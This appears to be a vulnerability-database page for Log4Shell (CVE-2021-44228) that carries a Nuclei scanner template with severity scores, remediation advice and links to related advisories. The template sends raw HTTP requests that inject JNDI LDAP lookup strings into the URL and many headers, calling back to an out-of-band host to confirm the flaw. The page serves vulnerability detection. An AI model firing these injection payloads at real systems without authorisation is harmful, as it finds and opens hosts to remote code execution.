Lucene search
ProjectDiscoveryNUCLEI:CVE-2021-44228HistoryDec 11, 2021 - 7:26 p.m.
Apache Log4j2 Remote Code Injection
2021-12-1119:26:50
ProjectDiscovery
github.com
23
cve2021
rce
oast
log4j
injection
kev
apache
ldap
endpoints
vulnerability
execution
exploitation
remediation
upgrade
CVSS2
9.3
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:M/Au:N/C:C/I:C/A:C
CVSS3
10
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
AI Score
10
Confidence
High
EPSS
0.965
Percentile
99.6%
Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
id: CVE-2021-44228
info:
name: Apache Log4j2 Remote Code Injection
author: melbadry9,dhiyaneshDK,daffainfo,anon-artist,0xceba,Tea,j4vaovo
severity: critical
description: |
Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
impact: |
Successful exploitation of this vulnerability can lead to remote code execution, potentially compromising the affected system.
remediation: Upgrade to Log4j 2.3.1 (for Java 6), 2.12.3 (for Java 7), or 2.17.0 (for Java 8 and later).
reference:
- https://logging.apache.org/log4j/2.x/security.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-44228
- https://github.com/advisories/GHSA-jfh8-c2jp-5v3q
- https://www.lunasec.io/docs/blog/log4j-zero-day/
- https://gist.github.com/bugbountynights/dde69038573db1c12705edb39f9a704a
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2021-44228
cwe-id: CWE-20,CWE-917
epss-score: 0.97559
epss-percentile: 0.99998
cpe: cpe:2.3:a:apache:log4j:*:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: apache
product: log4j
tags: cve2021,cve,rce,oast,log4j,injection,kev,apache
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- raw:
- |
GET /?x=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}/a} HTTP/1.1
Host: {{Hostname}}
- |
GET / HTTP/1.1
Host: {{Hostname}}
Accept: application/xml, application/json, text/plain, text/html, */${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accept.{{interactsh-url}}}
Accept-Encoding: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.acceptencoding.{{interactsh-url}}}
Accept-Language: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.acceptlanguage.{{interactsh-url}}}
Access-Control-Request-Headers: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accesscontrolrequestheaders.{{interactsh-url}}}
Access-Control-Request-Method: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accesscontrolrequestmethod.{{interactsh-url}}}
Authentication: Basic ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.authenticationbasic.{{interactsh-url}}}
Authentication: Bearer ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.authenticationbearer.{{interactsh-url}}}
Cookie: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.cookiename.{{interactsh-url}}}=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.cookievalue.{{interactsh-url}}}
Location: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.location.{{interactsh-url}}}
Origin: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.origin.{{interactsh-url}}}
Referer: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.referer.{{interactsh-url}}}
Upgrade-Insecure-Requests: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.upgradeinsecurerequests.{{interactsh-url}}}
User-Agent: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.useragent.{{interactsh-url}}}
X-Api-Version: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xapiversion.{{interactsh-url}}}
X-CSRF-Token: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xcsrftoken.{{interactsh-url}}}
X-Druid-Comment: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xdruidcomment.{{interactsh-url}}}
X-Forwarded-For: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xforwardedfor.{{interactsh-url}}}
X-Origin: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xorigin.{{interactsh-url}}}
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
- type: regex
part: interactsh_request
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
extractors:
- type: kval
kval:
- type: regex
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
part: interactsh_request
- type: regex
group: 1
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
part: interactsh_request
# digest: 4a0a0047304502202884fb76d02d44ae24b3e9bc5914a20e89726f929f3a1472cb9ce81e16f6c7320221009fb4e79fd5e58f4a49ccbeff467c990c3be6e32a7e03a2af8db207849e937d5f:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402203c401dcfe6f3c1f07d0e14f59b9d5fbfcc5aae8f5549cbf78d618770e410646b022040081c8a73749310437cd2795c22e2de2ea525e182d25ca46f81d8add2d0970c:922c64590222798bb761d5b6d8e72950Related
mageia
mageia
Updated log4j packages fix security vulnerability
2021-12-11 04:02:37
githubexploit
githubexploit
Exploit for Expression Language Injection in Apache Log4J
2021-12-15 12:07:05
Exploit for Deserialization of Untrusted Data in Apache Log4J
2021-12-21 17:40:02
Exploit for Deserialization of Untrusted Data in Apache Log4J
2022-11-08 15:29:42
openvas
openvas
Ubuntu: Security Advisory (USN-5192-2)
2022-08-26 00:00:00
Fedora: Security Advisory for jansi (FEDORA-2021-66d6c484f3)
2021-12-23 00:00:00
Apache Struts 2.5.x Log4j RCE Vulnerability (Log4Shell) - Version Check
2021-12-13 00:00:00
nessus
nessus
Debian DLA-2842-1 : apache-log4j2 - LTS security update
2021-12-13 00:00:00
Amazon Linux AMI : log4j-cve-2021-44228-hotpatch (ALAS-2022-1601)
2022-06-16 00:00:00
Apache Solr 7.4.0 <= 7.7.3 / 8.0.0 <= 8.11.0 RCE
2022-12-08 00:00:00
thn
thn
zdt
zdt
Apache Log4j2 2.14.1 - Information Disclosure Exploit
2021-12-14 00:00:00
VMware vCenter Server Unauthenticated Log4Shell JNDI Injection Remote Code Execution Exploit
2022-01-20 00:00:00
Intel Data Center Manager 5.1 Local Privilege Escalation Vulnerability
2022-12-10 00:00:00
redhat
redhat
freebsd
freebsd
bastillion -- log4j vulnerability
2021-12-10 00:00:00
serviio -- affected by log4j vulnerability
2021-12-13 00:00:00
threatpost
threatpost
SAP Kicks Log4Shell Vulnerability Out of 20 Apps
2021-12-15 19:31:30
Where the Latest Log4Shell Attacks Are Coming From
2021-12-13 19:00:01
What the Log4Shell Bug Means for SMBs: Experts Weigh In
2021-12-14 17:54:47
suse
suse
Security update for log4j (important)
2021-12-13 00:00:00
ibm
ibm
hackerone
hackerone
Judge.me : Log4j RCE on https://judge.me/reviews
2021-12-15 10:30:12
impervablog
impervablog
2021 in Review, Part 3: 5 Things Security Professionals Were Discussing this Year
2021-12-30 13:26:47
5 Things We’ve Learned About CVE-2021-44228
2021-12-17 06:44:55
rapid7blog
rapid7blog
What's New in InsightIDR: Q4 2021 in Review
2022-01-06 20:41:17
The 2021 Naughty and Nice Lists: Cybersecurity Edition
2022-01-10 14:57:53
qualysblog
qualysblog
Qualys Study Reveals How Enterprises Responded to Log4Shell
2022-03-18 13:00:00
msrc
msrc
Microsoft’s Response to CVE-2021-44228 Apache Log4j 2
2021-12-12 08:00:00
Microsoft’s Response to CVE-2021-44228 Apache Log4j 2
2021-12-12 05:28:18
malwarebytes
malwarebytes
What SMBs can do to protect against Log4Shell attacks
2021-12-15 20:59:31
f5
f5
K19026212 : Apache Log4j2 Remote Code Execution vulnerability CVE-2021-44228
2021-12-10 00:00:00
akamaiblog
akamaiblog
wallarmlab
wallarmlab
5 things you must know about Log4Shell
2021-12-11 01:22:39
Update on Log4Shell (CVE-2021-44228)
2021-12-10 20:22:36
metasploit
metasploit
VMware vCenter Server Unauthenticated JNDI Injection RCE (via Log4Shell)
2022-01-12 20:34:45
MobileIron Core Unauthenticated JNDI Injection RCE (via Log4Shell)
2022-07-29 17:31:15
packetstorm
packetstorm
VMware vCenter Server Unauthenticated Log4Shell JNDI Injection Remote Code Execution
2022-01-20 00:00:00
AD Manager Plus 7122 Remote Code Execution
2023-04-03 00:00:00
ics
ics
Karakurt Data Extortion Group
2023-12-12 12:00:00
Johnson Controls exacq Enterprise Manager
2021-12-23 12:00:00
kaspersky
kaspersky
KLA12396 RCE vulnerability in Microsoft Developer Tools
2021-12-16 00:00:00
exploitdb
exploitdb
Apache Log4j 2 - Remote Code Execution (RCE)
2021-12-14 00:00:00
talosblog
talosblog
How CVSS 4.0 changes (or doesn’t) the way we see vulnerability severity
2024-02-21 13:54:48
CVSS2
9.3
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:M/Au:N/C:C/I:C/A:C
CVSS3
10
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
AI Score
10
Confidence
High
EPSS
0.965
Percentile
99.6%
Related for NUCLEI:CVE-2021-44228